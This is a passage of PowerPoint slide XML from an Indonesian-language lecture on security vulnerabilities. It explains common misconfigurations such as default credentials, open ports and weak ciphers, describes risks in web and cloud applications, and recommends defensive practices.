              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>System Configuration Vulnerabilities / Misconfigurations</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penjelasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Default settings:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Banyak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pakai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bawaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pabrik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (default credentials, default services </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) → </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dieksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Unsecured root accounts:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> admin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> password </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> → privilege escalation &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penuh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Open ports and services:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Port/service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> → entry point </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Unsecure protocols:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> FTP, Telnet, HTTP (cleartext) → data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Weak encryption:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Gunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cipher </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lawas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (MD5, DES, RC4) → data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>didekripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Errors (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> error messages detail):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Bisa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membocorkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sensitif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (software version, stack trace) yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> attacker.</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177</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="197272949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Aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> web dan cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menimbulkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>unik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berasal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesalahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>praktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengkodean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pihak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diketahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengeksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelemahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sensitif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengganggu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengkompromikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluruh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Dalam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud, model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanggung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jawab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bersama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> multi-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyewa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menambah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kompleksitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengatasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengembang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>profesional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>praktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengkodean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penilaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teratur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperbarui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pihak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperbarui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengikuti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rekomendasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
